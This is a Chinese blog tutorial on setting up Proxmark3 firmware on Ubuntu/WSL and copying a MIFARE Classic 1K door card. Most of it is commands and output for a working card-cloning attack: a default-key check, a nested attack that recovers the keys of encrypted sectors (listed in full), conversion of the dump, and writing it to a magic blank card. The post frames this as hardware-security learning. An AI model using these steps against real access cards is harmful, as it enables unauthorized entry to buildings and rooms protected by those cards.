PM3环境搭建和M1卡复制

最新推荐文章于 2021-07-23 19:19:05 发布

1_Can

最新推荐文章于 2021-07-23 19:19:05 发布

阅读量1.8k

点赞数

分类专栏：硬件安全

本文链接：https://blog.csdn.net/i_can1/article/details/108384173

版权

硬件安全专栏收录该内容

4 篇文章 0 订阅

订阅专栏

PM3环境搭建

windows的环境搭建比较麻烦，有虚拟机的话可以用虚拟机，强烈安利WSL(Windows subsystem for Linux)，非常友好。
接下来介绍基于Ubuntu的环境搭建，参考PM3Wiki
首先检查更新

sudo apt-get update && sudo apt-get upgrade

然后安装所依赖的工具

sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd

拉源码

git clone https://github.com/proxmark/proxmark3.git

当然可以使用第三方的固件，如Iceman

git clone https://github.com/RfidResearchGroup/proxmark3.git

然后获取最新的内容，进行权限配置

cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout

编译源文件

make clean && make all

然后就可以插入PM3了，由于我用的是WSL，Ubuntu与主机共用串口，所以需要先确定端口号，为COM7，就可以直接连接了，

 sudo ./proxmark3 /dev/ttyS7

M1卡破解

首先进行卡片类型识别，先查看没有卡的时候天线信号

proxmark3> hw tune

Measuring antenna characteristics, please wait.........
# LF antenna: 24.61 V @   125.00 kHz
# LF antenna: 29.84 V @   134.00 kHz
# LF optimal: 31.21 V @   130.43 kHz
# HF antenna: 24.53 V @    13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

将卡放在高频区，再进行天线信号检测


Measuring antenna characteristics, please wait.........
# LF antenna: 25.16 V @   125.00 kHz
# LF antenna: 30.94 V @   134.00 kHz
# LF optimal: 32.31 V @   130.43 kHz
# HF antenna: 19.60 V @    13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

发现HF电压发生明显变化，则该卡为高频卡，同样也可用该方法识别低频卡，使用进一步的命令，识别该卡为M1卡

proxmark3> hf search

 UID : 60 64 7d 26
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK

Valid ISO14443A Tag Found - Quiting Search

查看扇区是否采用默认密码，

proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no:  0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9

To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A           |key B           |
|---|----------------|----------------|
|000|  ffffffffffff  |  ffffffffffff  |
|001|        ?       |        ?       |
|002|  ffffffffffff  |  ffffffffffff  |
|003|        ?       |        ?       |
|004|  ffffffffffff  |  ffffffffffff  |
|005|  ffffffffffff  |  ffffffffffff  |
|006|  ffffffffffff  |  ffffffffffff  |
|007|  ffffffffffff  |  ffffffffffff  |
|008|  ffffffffffff  |  ffffffffffff  |
|009|  ffffffffffff  |  ffffffffffff  |
|010|  ffffffffffff  |  ffffffffffff  |
|011|  ffffffffffff  |  ffffffffffff  |
|012|  ffffffffffff  |  ffffffffffff  |
|013|  ffffffffffff  |  ffffffffffff  |
|014|  ffffffffffff  |  ffffffffffff  |
|015|  ffffffffffff  |  ffffffffffff  |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory

具体的命令使用说明，可以自行help
发现部分扇区采用默认密码。ffffffffffff
M1卡存在漏洞，可以通过已知扇区的key破解加密扇区的key

proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no:  0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43


-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  112233445566  | 1 |  01206f340100  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  50f6a442e26d  | 1 |  e59925b18b43  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...

已成功破解其他加密扇区的key，并且写到了dumpkeys.bin文件中，需要将该文件转化成PM3认识的格式才可进行门卡的复制

proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
 
-----Finished
proxmark3>

然后将白卡放在高频区，把数据写到白卡里

proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml

大功告成！！！

参考链接：
https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux
https://www.cnblogs.com/k1two2/p/5706516.html
https://lzy-wi.github.io/2018/07/26/proxmark3/

1_Can

关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
PM3环境搭建和M1卡复制

PM3环境搭建windows的环境搭建比较麻烦，有虚拟机的话可以用虚拟机，强烈安利WSL(Windows subsystem for Linux)，非常友好。接下来介绍基于Ubuntu的环境搭建，参考PM3Wiki首先检查更新sudo apt-get update && sudo apt-get upgrade然后安装所依赖的工具sudo apt install p7zip git build-essential libreadline5 libreadline-dev lib
复制链接

扫一扫